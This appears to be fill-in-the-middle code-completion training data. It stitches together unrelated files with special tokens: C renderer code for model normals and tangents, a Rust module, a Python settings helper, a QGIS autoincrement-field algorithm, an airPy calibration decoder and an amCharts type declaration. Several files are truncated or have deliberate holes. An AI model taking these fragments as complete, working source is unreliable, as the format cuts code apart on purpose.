/* load the tags */
byte *animbuf = NULL;
const char *buffer;
FS_LoadFile(animname, &animbuf);
buffer = (const char *)animbuf;
/* count the animations */
n = Com_CountTokensInBuffer(buffer);
if ((n % 4) != 0) {
FS_FreeFile(animbuf);
Com_Error(ERR_DROP, "invalid syntax: %s", animname);
}
/* each animation definition is made out of 4 tokens */
n /= 4;
if (n > MAX_ANIMS)
n = MAX_ANIMS;
mod->animdata = Mem_PoolAllocTypeN(mAliasAnim_t, n, vid_modelPool);
anim = mod->animdata;
text = buffer;
mod->num_anims = 0;
do {
/* get the name */
token = Com_Parse(&text);
if (!text)
break;
Q_strncpyz(anim->name, token, sizeof(anim->name));
/* get the start */
token = Com_Parse(&text);
if (!text)
break;
anim->from = atoi(token);
if (anim->from < 0)
Com_Error(ERR_FATAL, "R_ModLoadAnims: negative start frame for %s", animname);
else if (anim->from > mod->num_frames)
Com_Error(ERR_FATAL, "R_ModLoadAnims: start frame is higher than models frame count (%i) (model: %s)",
mod->num_frames, animname);
/* get the end */
token = Com_Parse(&text);
if (!text)
break;
anim->to = atoi(token);
if (anim->to < 0)
Com_Error(ERR_FATAL, "R_ModLoadAnims: negative end frame for %s", animname);
else if (anim->to > mod->num_frames)
Com_Error(ERR_FATAL, "R_ModLoadAnims: end frame is higher than models frame count (%i) (model: %s)",
mod->num_frames, animname);
/* get the fps */
token = Com_Parse(&text);
if (!text)
break;
anim->time = (atof(token) > 0.01) ? (1000.0 / atof(token)) : (1000.0 / 0.01);
/* add it */
mod->num_anims++;
anim++;
} while (mod->num_anims < n);
FS_FreeFile(animbuf);
}
/**
* @brief Calculates a per-vertex tangentspace basis and stores it in GL arrays attached to the mesh
* @param mesh The mesh to calculate normals for
* @param framenum The animation frame to calculate normals for
* @param translate The frame translation for the given animation frame
* @param backlerp Whether to store the results in the GL arrays for the previous keyframe or the next keyframe
* @sa R_ModCalcUniqueNormalsAndTangents
*/
static void R_ModCalcNormalsAndTangents (mAliasMesh_t *mesh, int framenum, const vec3_t translate, bool backlerp)
{
int i, j;
mAliasVertex_t *vertexes = &mesh->vertexes[framenum * mesh->num_verts];
mAliasCoord_t *stcoords = mesh->stcoords;
const int numIndexes = mesh->num_tris * 3;
const int32_t *indexArray = mesh->indexes;
vec3_t triangleNormals[MAX_ALIAS_TRIS];
vec3_t triangleTangents[MAX_ALIAS_TRIS];
vec3_t triangleBitangents[MAX_ALIAS_TRIS];
float *texcoords, *verts, *normals, *tangents;
/* set up array pointers for either the previous keyframe or the next keyframe */
texcoords = mesh->texcoords;
if (backlerp) {
verts = mesh->verts;
normals = mesh->normals;
tangents = mesh->tangents;
} else {
verts = mesh->next_verts;
normals = mesh->next_normals;
tangents = mesh->next_tangents;
}
/* calculate per-triangle surface normals and tangents*/
for (i = 0, j = 0; i < numIndexes; i += 3, j++) {
vec3_t dir1, dir2;
vec2_t dir1uv, dir2uv;
/* calculate two mostly perpendicular edge directions */
VectorSubtract(vertexes[indexArray[i + 0]].point, vertexes[indexArray[i + 1]].point, dir1);
VectorSubtract(vertexes[indexArray[i + 2]].point, vertexes[indexArray[i + 1]].point, dir2);
Vector2Subtract(stcoords[indexArray[i + 0]], stcoords[indexArray[i + 1]], dir1uv);
Vector2Subtract(stcoords[indexArray[i + 2]], stcoords[indexArray[i + 1]], dir2uv);
/* we have two edge directions, we can calculate a third vector from
* them, which is the direction of the surface normal */
CrossProduct(dir1, dir2, triangleNormals[j]);
/* normalize */
VectorNormalizeFast(triangleNormals[j]);
/* then we use the texture coordinates to calculate a tangent space */
if ((dir1uv[1] * dir2uv[0] - dir1uv[0] * dir2uv[1]) != 0.0) {
const float frac = 1.0 / (dir1uv[1] * dir2uv[0] - dir1uv[0] * dir2uv[1]);
vec3_t tmp1, tmp2;
/* calculate tangent */
VectorMul(-1.0 * dir2uv[1] * frac, dir1, tmp1);
VectorMul(dir1uv[1] * frac, dir2, tmp2);
VectorAdd(tmp1, tmp2, triangleTangents[j]);
/* calculate bitangent */
VectorMul(-1.0 * dir2uv[0] * frac, dir1, tmp1);
VectorMul(dir1uv[0] * frac, dir2, tmp2);
VectorAdd(tmp1, tmp2, triangleBitangents[j]);
/* normalize */
VectorNormalizeFast(triangleTangents[j]);
VectorNormalizeFast(triangleBitangents[j]);
} else {
VectorClear(triangleTangents[j]);
VectorClear(triangleBitangents[j]);
}
}
/* for each vertex */
for (i = 0; i < mesh->num_verts; i++) {
vec3_t n, b, v;
vec4_t t;
const int len = mesh->revIndexes[i].length;
const int32_t *list = mesh->revIndexes[i].list;
VectorClear(n);
VectorClear(t);
VectorClear(b);
/* for each vertex that got mapped to this one (ie. for each triangle this vertex is a part of) */
for (j = 0; j < len; j++) {
const int32_t idx = list[j] / 3;
VectorAdd(n, triangleNormals[idx], n);
VectorAdd(t, triangleTangents[idx], t);
VectorAdd(b, triangleBitangents[idx], b);
}
/* normalization here does shared-vertex smoothing */
VectorNormalizeFast(n);
VectorNormalizeFast(t);
VectorNormalizeFast(b);
/* Grahm-Schmidt orthogonalization */
Orthogonalize(t, n);
/* calculate handedness */
CrossProduct(n, t, v);
t[3] = (DotProduct(v, b) < 0.0) ? -1.0 : 1.0;
/* copy this vertex's info to all the right places in the arrays */
for (j = 0; j < len; j++) {
const int32_t idx = list[j];
const int meshIndex = mesh->indexes[list[j]];
Vector2Copy(stcoords[meshIndex], (texcoords + (2 * idx)));
VectorAdd(vertexes[meshIndex].point, translate, (verts + (3 * idx)));
VectorCopy(n, (normals + (3 * idx)));
Vector4Copy(t, (tangents + (4 * idx)));
}
}
}
/**
* @brief Tries to load a mdx file that contains the normals and the tangents for a model.
* @sa R_ModCalcNormalsAndTangents
* @sa R_ModCalcUniqueNormalsAndTangents
* @param mod The model to load the mdx file for
*/
bool R_ModLoadMDX (model_t *mod)
{
int i;
for (i = 0; i < mod->alias.num_meshes; i++) {
mAliasMesh_t *mesh = &mod->alias.meshes[i];
char mdxFileName[MAX_QPATH];
byte *buffer = NULL, *buf;
const int32_t *intbuf;
uint32_t version;
int sharedTris[MAX_ALIAS_VERTS];
Com_StripExtension(mod->name, mdxFileName, sizeof(mdxFileName));
Com_DefaultExtension(mdxFileName, sizeof(mdxFileName), ".mdx");
if (FS_LoadFile(mdxFileName, &buffer) == -1)
return false;
buf = buffer;
if (strncmp((const char *) buf, IDMDXHEADER, strlen(IDMDXHEADER))) {
FS_FreeFile(buf);
Com_Error(ERR_DROP, "No mdx file buffer given");
}
buffer += strlen(IDMDXHEADER) * sizeof(char);
version = LittleLong(*(uint32_t*) buffer);
if (version != MDX_VERSION) {
FS_FreeFile(buf);
Com_Error(ERR_DROP, "Invalid version of the mdx file, expected %i, found %i",
MDX_VERSION, version);
}
buffer += sizeof(uint32_t);
intbuf = (const int32_t *) buffer;
mesh->num_verts = LittleLong(*intbuf);
if (mesh->num_verts <= 0 || mesh->num_verts > MAX_ALIAS_VERTS) {
FS_FreeFile(buf);
Com_Error(ERR_DROP, "mdx file for %s has to many (or no) vertices: %i", mod->name, mesh->num_verts);
}
intbuf++;
mesh->num_indexes = LittleLong(*intbuf);
intbuf++;
mesh->indexes = Mem_PoolAllocTypeN(int32_t, mesh->num_indexes, vid_modelPool);
mesh->revIndexes = Mem_PoolAllocTypeN(mIndexList_t, mesh->num_verts, vid_modelPool);
mesh->vertexes = Mem_PoolAllocTypeN(mAliasVertex_t, mesh->num_verts * mod->alias.num_frames, vid_modelPool);
/* load index that maps triangle verts to Vertex objects */
for (i = 0; i < mesh->num_indexes; i++) {
mesh->indexes[i] = LittleLong(*intbuf);
intbuf++;
}
for (i = 0; i < mesh->num_verts; i++)
sharedTris[i] = 0;
/* set up reverse-index that maps Vertex objects to a list of triangle verts */
for (i = 0; i < mesh->num_indexes; i++)
sharedTris[mesh->indexes[i]]++;
for (i = 0; i < mesh->num_verts; i++) {
mesh->revIndexes[i].length = 0;
mesh->revIndexes[i].list = Mem_PoolAllocTypeN(int32_t, sharedTris[i], vid_modelPool);
}
for (i = 0; i < mesh->num_indexes; i++)
mesh->revIndexes[mesh->indexes[i]].list[mesh->revIndexes[mesh->indexes[i]].length++] = i;
FS_FreeFile(buf);
}
return true;
}
/**
* @brief Calculates normals and tangents for all frames and does vertex merging based on smoothness
* @param mesh The mesh to calculate normals for
* @param nFrames How many frames the mesh has
* @param smoothness How aggressively should normals be smoothed; value is compared with dotproduct of vectors to decide if they should be merged
* @sa R_ModCalcNormalsAndTangents
*/
void R_ModCalcUniqueNormalsAndTangents (mAliasMesh_t *mesh, int nFrames, float smoothness)
{
int i, j;
vec3_t triangleNormals[MAX_ALIAS_TRIS];
vec3_t triangleTangents[MAX_ALIAS_TRIS];
vec3_t triangleBitangents[MAX_ALIAS_TRIS];
const mAliasVertex_t *vertexes = mesh->vertexes;
mAliasCoord_t *stcoords = mesh->stcoords;
mAliasComplexVertex_t tmpVertexes[MAX_ALIAS_VERTS];
vec3_t tmpBitangents[MAX_ALIAS_VERTS];
const int numIndexes = mesh->num_tris * 3;
const int32_t *indexArray = mesh->indexes;
int indRemap[MAX_ALIAS_VERTS];
int sharedTris[MAX_ALIAS_VERTS];
int numVerts = 0;
if (numIndexes >= MAX_ALIAS_VERTS)
Com_Error(ERR_DROP, "model %s has too many tris", mesh->name);
int32_t* const newIndexArray = Mem_PoolAllocTypeN(int32_t, numIndexes, vid_modelPool);
/* calculate per-triangle surface normals */
for (i = 0, j = 0; i < numIndexes; i += 3, j++) {
vec3_t dir1, dir2;
vec2_t dir1uv, dir2uv;
/* calculate two mostly perpendicular edge directions */
VectorSubtract(vertexes[indexArray[i + 0]].point, vertexes[indexArray[i + 1]].point, dir1);
VectorSubtract(vertexes[indexArray[i + 2]].point, vertexes[indexArray[i + 1]].point, dir2);
Vector2Subtract(stcoords[indexArray[i + 0]], stcoords[indexArray[i + 1]], dir1uv);
Vector2Subtract(stcoords[indexArray[i + 2]], stcoords[indexArray[i + 1]], dir2uv);
/* we have two edge directions, we can calculate a third vector from
* them, which is the direction of the surface normal */
CrossProduct(dir1, dir2, triangleNormals[j]);
/* then we use the texture coordinates to calculate a tangent space */
if ((dir1uv[1] * dir2uv[0] - dir1uv[0] * dir2uv[1]) != 0.0) {
const float frac = 1.0 / (dir1uv[1] * dir2uv[0] - dir1uv[0] * dir2uv[1]);
vec3_t tmp1, tmp2;
/* calculate tangent */
VectorMul(-1.0 * dir2uv[1] * frac, dir1, tmp1);
VectorMul(dir1uv[1] * frac, dir2, tmp2);
VectorAdd(tmp1, tmp2, triangleTangents[j]);
/* calculate bitangent */
VectorMul(-1.0 * dir2uv[0] * frac, dir1, tmp1);
VectorMul(dir1uv[0] * frac, dir2, tmp2);
VectorAdd(tmp1, tmp2, triangleBitangents[j]);
} else {
const float frac = 1.0 / (0.00001);
vec3_t tmp1, tmp2;
/* calculate tangent */
VectorMul(-1.0 * dir2uv[1] * frac, dir1, tmp1);
VectorMul(dir1uv[1] * frac, dir2, tmp2);
VectorAdd(tmp1, tmp2, triangleTangents[j]);
/* calculate bitangent */
VectorMul(-1.0 * dir2uv[0] * frac, dir1, tmp1);
VectorMul(dir1uv[0] * frac, dir2, tmp2);
VectorAdd(tmp1, tmp2, triangleBitangents[j]);
}
/* normalize */
VectorNormalizeFast(triangleNormals[j]);
VectorNormalizeFast(triangleTangents[j]);
VectorNormalizeFast(triangleBitangents[j]);
Orthogonalize(triangleTangents[j], triangleBitangents[j]);
}
/* do smoothing */
for (i = 0; i < numIndexes; i++) {
const int idx = (i - i % 3) / 3;
VectorCopy(triangleNormals[idx], tmpVertexes[i].normal);
VectorCopy(triangleTangents[idx], tmpVertexes[i].tangent);
VectorCopy(triangleBitangents[idx], tmpBitangents[i]);
for (j = 0; j < numIndexes; j++) {
const int idx2 = (j - j % 3) / 3;
/* don't add a vertex with itself */
if (j == i)
continue;
/* only average normals if vertices have the same position
* and the normals aren't too far apart to start with */
if (VectorEqual(vertexes[indexArray[i]].point, vertexes[indexArray[j]].point)
&& DotProduct(triangleNormals[idx], triangleNormals[idx2]) > smoothness) {
/* average the normals */
VectorAdd(tmpVertexes[i].normal, triangleNormals[idx2], tmpVertexes[i].normal);
/* if the tangents match as well, average them too.
* Note that having matching normals without matching tangents happens
* when the order of vertices in two triangles sharing the vertex
* in question is different. This happens quite frequently if the
* modeler does not go out of their way to avoid it. */
if (Vector2Equal(stcoords[indexArray[i]], stcoords[indexArray[j]])
&& DotProduct(triangleTangents[idx], triangleTangents[idx2]) > smoothness
&& DotProduct(triangleBitangents[idx], triangleBitangents[idx2]) > smoothness) {
/* average the tangents */
VectorAdd(tmpVertexes[i].tangent, triangleTangents[idx2], tmpVertexes[i].tangent);
VectorAdd(tmpBitangents[i], triangleBitangents[idx2], tmpBitangents[i]);
}
}
}
VectorNormalizeFast(tmpVertexes[i].normal);
VectorNormalizeFast(tmpVertexes[i].tangent);
VectorNormalizeFast(tmpBitangents[i]);
}
/* assume all vertices are unique until proven otherwise */
for (i = 0; i < numIndexes; i++)
indRemap[i] = -1;
/* merge vertices that have become identical */
for (i = 0; i < numIndexes; i++) {
vec3_t n, b, t, v;
if (indRemap[i] != -1)
continue;
for (j = i + 1; j < numIndexes; j++) {
if (Vector2Equal(stcoords[indexArray[i]], stcoords[indexArray[j]])
&& VectorEqual(vertexes[indexArray[i]].point, vertexes[indexArray[j]].point)
&& (DotProduct(tmpVertexes[i].normal, tmpVertexes[j].normal) > smoothness)
&& (DotProduct(tmpVertexes[i].tangent, tmpVertexes[j].tangent) > smoothness)) {
indRemap[j] = i;
newIndexArray[j] = numVerts;
}
}
VectorCopy(tmpVertexes[i].normal, n);
VectorCopy(tmpVertexes[i].tangent, t);
VectorCopy(tmpBitangents[i], b);
/* normalization here does shared-vertex smoothing */
VectorNormalizeFast(n);
VectorNormalizeFast(t);
VectorNormalizeFast(b);
/* Grahm-Schmidt orthogonalization */
VectorMul(DotProduct(t, n), n, v);
VectorSubtract(t, v, t);
VectorNormalizeFast(t);
/* calculate handedness */
CrossProduct(n, t, v);
tmpVertexes[i].tangent[3] = (DotProduct(v, b) < 0.0) ? -1.0 : 1.0;
VectorCopy(n, tmpVertexes[i].normal);
VectorCopy(t, tmpVertexes[i].tangent);
newIndexArray[i] = numVerts++;
indRemap[i] = i;
}
for (i = 0; i < numVerts; i++)
sharedTris[i] = 0;
for (i = 0; i < numIndexes; i++)
sharedTris[newIndexArray[i]]++;
/* set up reverse-index that maps Vertex objects to a list of triangle verts */
mesh->revIndexes = Mem_PoolAllocTypeN(mIndexList_t, numVerts, vid_modelPool);
for (i = 0; i < numVerts; i++) {
mesh->revIndexes[i].length = 0;
mesh->revIndexes[i].list = Mem_PoolAllocTypeN(int32_t, sharedTris[i], vid_modelPool);
}
/* merge identical vertexes, storing only unique ones */
mAliasVertex_t* const newVertexes = Mem_PoolAllocTypeN(mAliasVertex_t, numVerts * nFrames, vid_modelPool);
mAliasCoord_t* const newStcoords = Mem_PoolAllocTypeN(mAliasCoord_t, numVerts, vid_modelPool);
for (i = 0; i < numIndexes; i++) {
const int idx = indexArray[indRemap[i]];
const int idx2 = newIndexArray[i];
/* add vertex to new vertex array */
VectorCopy(vertexes[idx].point, newVertexes[idx2].point);
Vector2Copy(stcoords[idx], newStcoords[idx2]);
mesh->revIndexes[idx2].list[mesh->revIndexes[idx2].length++] = i;
}
/* copy over the points from successive frames */
for (i = 1; i < nFrames; i++) {
for (j = 0; j < numIndexes; j++) {
const int idx = indexArray[indRemap[j]] + (mesh->num_verts * i);
const int idx2 = newIndexArray[j] + (numVerts * i);
VectorCopy(vertexes[idx].point, newVertexes[idx2].point);
}
}
/* copy new arrays back into original mesh */
Mem_Free(mesh->stcoords);
Mem_Free(mesh->indexes);
Mem_Free(mesh->vertexes);
mesh->num_verts = numVerts;
mesh->vertexes = newVertexes;
mesh->stcoords = newStcoords;
mesh->indexes = newIndexArray;
}
image_t* R_AliasModelGetSkin (const char *modelFileName, const char *skin)
{
image_t* result;
if (skin[0] != '.')
result = R_FindImage(skin, it_skin);
else {
char path[MAX_QPATH];
Com_ReplaceFilename(modelFileName, skin + 1, path, sizeof(path));
result = R_FindImage(path, it_skin);
}
return result;
}
image_t* R_AliasModelState (const model_t *mod, int *mesh, int *frame, int *oldFrame, int *skin)
{
/* check animations */
if ((*frame >= mod->alias.num_frames) || *frame < 0) {
Com_Printf("R_AliasModelState %s: no such frame %d (# %i)\n", mod->name, *frame, mod->alias.num_frames);
*frame = 0;
}
if ((*oldFrame >= mod->alias.num_frames) || *oldFrame < 0) {
Com_Printf("R_AliasModelState %s: no such oldframe %d (# %i)\n", mod->name, *oldFrame, mod->alias.num_frames);
*oldFrame = 0;
}
if (*mesh < 0 || *mesh >= mod->alias.num_meshes)
*mesh = 0;
if (!mod->alias.meshes)
return NULL;
/* use default skin - this is never null - but maybe the placeholder texture */
if (*skin < 0 || *skin >= mod->alias.meshes[*mesh].num_skins)
*skin = 0;
if (!mod->alias.meshes[*mesh].num_skins)
Com_Error(ERR_DROP, "Model with no skins");
if (mod->alias.meshes[*mesh].skins[*skin].skin->texnum <= 0)
Com_Error(ERR_DROP, "Texture is already freed and no longer uploaded, texnum is invalid for model %s",
mod->name);
return mod->alias.meshes[*mesh].skins[*skin].skin;
}
/**
* @brief Converts the model data into the opengl arrays
* @param mod The model to convert
* @param mesh The particular mesh of the model to convert
* @param backlerp The linear back interpolation when loading the data
* @param framenum The frame number of the mesh to load (if animated)
* @param oldframenum The old frame number (used to interpolate)
* @param prerender If this is @c true, all data is filled to the arrays. If @c false, then
* e.g. the normals are only filled to the arrays if the lighting is activated.
*
* @note If GLSL programs are enabled, the actual interpolation will be done on the GPU, but
* this function is still needed to fill the GL arrays for the keyframes
*/
void R_FillArrayData (mAliasModel_t* mod, mAliasMesh_t *mesh, float backlerp, int framenum, int oldframenum, bool prerender)
{
const mAliasFrame_t *frame, *oldframe;
vec3_t move;
const float frontlerp = 1.0 - backlerp;
vec3_t r_mesh_verts[MAX_ALIAS_VERTS];
vec_t *texcoord_array, *vertex_array_3d;
frame = mod->frames + framenum;
oldframe = mod->frames + oldframenum;
/* try to do keyframe-interpolation on the GPU if possible*/
if (r_state.lighting_enabled) {
/* we only need to change the array data if we've switched to a new keyframe */
if (mod->curFrame != framenum) {
/* if we're rendering frames in order, the "next" keyframe from the previous
* time through will be our "previous" keyframe now, so we can swap pointers
* instead of generating it again from scratch */
if (mod->curFrame == oldframenum) {
vec_t *tmp1 = mesh->verts;
vec_t *tmp2 = mesh->normals;
vec_t *tmp3 = mesh->tangents;
mesh->verts = mesh->next_verts;
mesh->next_verts = tmp1;
mesh->normals = mesh->next_normals;
mesh->next_normals = tmp2;
mesh->tangents = mesh->next_tangents;
mesh->next_tangents = tmp3;
/* if we're alternating between two keyframes, we don't need to generate
* anything; otherwise, generate the "next" keyframe*/
if (mod->oldFrame != framenum)
R_ModCalcNormalsAndTangents(mesh, framenum, frame->translate, false);
} else {
/* if we're starting a new animation or otherwise not rendering keyframes
* in order, we need to fill the arrays for both keyframes */
R_ModCalcNormalsAndTangents(mesh, oldframenum, oldframe->translate, true);
R_ModCalcNormalsAndTangents(mesh, framenum, frame->translate, false);
}
/* keep track of which keyframes are currently stored in our arrays */
mod->oldFrame = oldframenum;
mod->curFrame = framenum;
}
} else { /* otherwise, we have to do it on the CPU */
const mAliasVertex_t *v, *ov;
int i;
assert(mesh->num_verts < lengthof(r_mesh_verts));
v = &mesh->vertexes[framenum * mesh->num_verts];
ov = &mesh->vertexes[oldframenum * mesh->num_verts];
if (prerender)
R_ModCalcNormalsAndTangents(mesh, 0, oldframe->translate, true);
for (i = 0; i < 3; i++)
move[i] = backlerp * oldframe->translate[i] + frontlerp * frame->translate[i];
for (i = 0; i < mesh->num_verts; i++, v++, ov++) { /* lerp the verts */
VectorSet(r_mesh_verts[i],
move[0] + ov->point[0] * backlerp + v->point[0] * frontlerp,
move[1] + ov->point[1] * backlerp + v->point[1] * frontlerp,
move[2] + ov->point[2] * backlerp + v->point[2] * frontlerp);
}
R_ReallocateStateArrays(mesh->num_tris * 3);
R_ReallocateTexunitArray(&texunit_diffuse, mesh->num_tris * 3);
texcoord_array = texunit_diffuse.texcoord_array;
vertex_array_3d = r_state.vertex_array_3d;
/** @todo damn slow - optimize this */
for (i = 0; i < mesh->num_tris; i++) { /* draw the tris */
int j;
for (j = 0; j < 3; j++) {
const int arrayIndex = 3 * i + j;
const int meshIndex = mesh->indexes[arrayIndex];
Vector2Copy(mesh->stcoords[meshIndex], texcoord_array);
VectorCopy(r_mesh_verts[meshIndex], vertex_array_3d);
texcoord_array += 2;
vertex_array_3d += 3;
}
}
}
}
/**
* @brief Allocates data arrays for animated models. Only called once at loading time.
*/
void R_ModLoadArrayData (mAliasModel_t *mod, mAliasMesh_t *mesh, bool loadNormals)
{
const int v = mesh->num_tris * 3 * 3;
const int t = mesh->num_tris * 3 * 4;
const int st = mesh->num_tris * 3 * 2;
assert(mesh->verts == NULL);
assert(mesh->texcoords == NULL);
assert(mesh->normals == NULL);
assert(mesh->tangents == NULL);
assert(mesh->next_verts == NULL);
assert(mesh->next_normals == NULL);
assert(mesh->next_tangents == NULL);
mesh->verts = Mem_PoolAllocTypeN(float, v, vid_modelPool);
mesh->normals = Mem_PoolAllocTypeN(float, v, vid_modelPool);
mesh->tangents = Mem_PoolAllocTypeN(float, t, vid_modelPool);
mesh->texcoords = Mem_PoolAllocTypeN(float, st, vid_modelPool);
if (mod->num_frames == 1) {
R_FillArrayData(mod, mesh, 0.0, 0, 0, loadNormals);
} else {
mesh->next_verts = Mem_PoolAllocTypeN(float, v, vid_modelPool);
mesh->next_normals = Mem_PoolAllocTypeN(float, v, vid_modelPool);
mesh->next_tangents = Mem_PoolAllocTypeN(float, t, vid_modelPool);
mod->curFrame = -1;
mod->oldFrame = -1;
}
}<|fim▁end|> | as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version. |
<|file_name|>foo.rs<|end_file_name|><|fim▁begin|>pub use private::Quz;
pub use hidden::Bar;
mod private {
pub struct Quz;
}
#[doc(hidden)]
pub mod hidden {
pub struct Bar;
}
#[macro_export]
macro_rules! foo {<|fim▁hole|>}<|fim▁end|> | () => {} |
<|file_name|>utils.py<|end_file_name|><|fim▁begin|>"Utility functions for the tests."
import json
def get_settings(**defaults):
"Update the default settings by the contents of the 'settings.json' file."
result = defaults.copy()
with open("settings.json", "rb") as infile:
data = json.load(infile)
for key in result:
try:
result[key] = data[key]
except KeyError:
pass
if result.get(key) is None:
raise KeyError(f"Missing {key} value in settings.")
# Remove any trailing slash in the base URL.
result["BASE_URL"] = result["BASE_URL"].rstrip("/")<|fim▁hole|><|fim▁end|> | return result |
<|file_name|>AutoincrementalField.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""
***************************************************************************
AutoincrementalField.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *<|fim▁hole|>***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4.QtCore import QVariant
from qgis.core import QgsField, QgsFeature, QgsGeometry
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import ParameterVector
from processing.core.outputs import OutputVector
from processing.tools import dataobjects, vector
class AutoincrementalField(GeoAlgorithm):
INPUT = 'INPUT'
OUTPUT = 'OUTPUT'
def processAlgorithm(self, progress):
output = self.getOutputFromName(self.OUTPUT)
vlayer = \
dataobjects.getObjectFromUri(self.getParameterValue(self.INPUT))
vprovider = vlayer.dataProvider()
fields = vprovider.fields()
fields.append(QgsField('AUTO', QVariant.Int))
writer = output.getVectorWriter(fields, vprovider.geometryType(),
vlayer.crs())
inFeat = QgsFeature()
outFeat = QgsFeature()
inGeom = QgsGeometry()
nElement = 0
features = vector.features(vlayer)
nFeat = len(features)
for inFeat in features:
progress.setPercentage(int(100 * nElement / nFeat))
nElement += 1
inGeom = inFeat.geometry()
outFeat.setGeometry(inGeom)
attrs = inFeat.attributes()
attrs.append(nElement)
outFeat.setAttributes(attrs)
writer.addFeature(outFeat)
del writer
def defineCharacteristics(self):
self.name = 'Add autoincremental field'
self.group = 'Vector table tools'
self.addParameter(ParameterVector(self.INPUT,
self.tr('Input layer'), [ParameterVector.VECTOR_TYPE_ANY]))
self.addOutput(OutputVector(self.OUTPUT, self.tr('Incremented')))<|fim▁end|> | * the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* * |
<|file_name|>ap_save_tx_calibration.py<|end_file_name|><|fim▁begin|>"""
airPy is a flight controller based on pyboard and written in micropython.
The MIT License (MIT)
Copyright (c) 2016 Fabrizio Scimia, [email protected]
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import struct
class SaveTxCalibration:
MESSAGE_TYPE_ID = 110
def __init__(self):
pass
@staticmethod
def decode_payload(payload):
"""
Decode message payload
:param payload: byte stream representing the message payload
:return: a list of 3 list of floats representing the PWM threshold values for each of the N active channels
[[min threshold values],[max threshold values], [center threshold values]]
"""
# 4 byte per float * 3 set of thesholds
byte_per_thd_set = int(len(payload)/3)
min_thd_vals = [0.0 for i in range(0, int(byte_per_thd_set/4))]
max_thd_vals = [0.0 for i in range(0, int(byte_per_thd_set/4))]
center_thd_vals = [0.0 for i in range(0, int(byte_per_thd_set/4))]
for i in range(0, int(byte_per_thd_set/4)):
min_thd_vals[i] = struct.unpack('>f', payload[i*4:i*4 + 4])[0]
for i in range(0, int(byte_per_thd_set/4)):<|fim▁hole|> center_thd_vals[i] = struct.unpack('>f', payload[2*byte_per_thd_set + i*4:i*4 + 2*byte_per_thd_set + 4])[0]
return [min_thd_vals, max_thd_vals, center_thd_vals]<|fim▁end|> | max_thd_vals[i] = struct.unpack('>f', payload[byte_per_thd_set + i*4:i*4 + 4 + byte_per_thd_set])[0]
for i in range(0, int(byte_per_thd_set/4)): |
<|file_name|>PercentSeries.d.ts<|end_file_name|><|fim▁begin|>/**
* Defines Percent Chart Series.
*/
/**
* ============================================================================
* IMPORTS
* ============================================================================
* @hidden
*/
import { Series, SeriesDataItem, ISeriesProperties, ISeriesDataFields, ISeriesAdapters, ISeriesEvents } from "./Series";
import { ISpriteEvents, AMEvent } from "../../core/Sprite";
import { Sprite } from "../../core/Sprite";
import { Label } from "../../core/elements/Label";
import { Tick } from "../elements/Tick";
import { ListTemplate } from "../../core/utils/List";
import { Container } from "../../core/Container";
import { Animation } from "../../core/utils/Animation";
import { LegendDataItem, LegendSettings } from "../../charts/Legend";
import { ColorSet } from "../../core/utils/ColorSet";
import { PatternSet } from "../../core/utils/PatternSet";
import { PercentChart } from "../types/PercentChart";
import * as $type from "../../core/utils/Type";
/**
* ============================================================================
* DATA ITEM
* ============================================================================
* @hidden
*/
/**
* Defines a [[DataItem]] for [[PercentSeries]].
*
* @see {@link DataItem}
*/
export declare class PercentSeriesDataItem extends SeriesDataItem {
/**
* A type of slice used for this series.
*/
_slice: Sprite;
/**
* A reference to a slice label element.
*
* @ignore Exclude from docs
*/
_label: Label;
/**
* A reference to a slice tick element.
* @ignore Exclude from docs
*/
_tick: Tick;
/**
* A reference to a corresponding legend data item.
*/
protected _legendDataItem: LegendDataItem;
/**
* Custom settings for the legend item.
* Not used, only added to sattisfy LegendDataItem
*
* @ignore
*/
legendSettings: LegendSettings;
/**
* Defines a type of [[Component]] this data item is used for.
*/
_component: PercentSeries;
/**
* Constructor
*/
constructor();
/**
* Adds an `id` attribute the the slice element and returns its id.
*
* @ignore Exclude from docs
*/
uidAttr(): string;
/**
* Hide the data item (and corresponding visual elements).
*
* @param duration Duration (ms)
* @param delay Delay hiding (ms)
* @param toValue Target value for animation
* @param fields Fields to animate while hiding
*/
hide(duration?: number, delay?: number, toValue?: number, fields?: string[]): $type.Optional<Animation>;
/**
* Sets visibility of the Data Item.
*
* @param value Data Item
*/
setVisibility(value: boolean, noChangeValues?: boolean): void;
/**
* Show hidden data item (and corresponding visual elements).
*
* @param duration Duration (ms)
* @param delay Delay hiding (ms)
* @param fields Fields to animate while hiding
*/
show(duration?: number, delay?: number, fields?: string[]): $type.Optional<Animation>;
/**
* Category.
*
* @param value Category
*/
/**
* @return Category
*/
category: string;
/**
* Creates a marker used in the legend for this slice.
*
* @ignore Exclude from docs
* @param marker Marker container
*/
createLegendMarker(marker: Container): void;
/**
* A legend's data item, that corresponds to this data item.
*
* @param value Legend data item
*/
/**
* @return Legend data item
*/
legendDataItem: LegendDataItem;
/**
* A Tick element, related to this data item. (slice)
*
* @readonly
* @return Tick element
*/
readonly tick: this["_tick"];
/**
* A Label element, related to this data item. (slice)
*
* @readonly
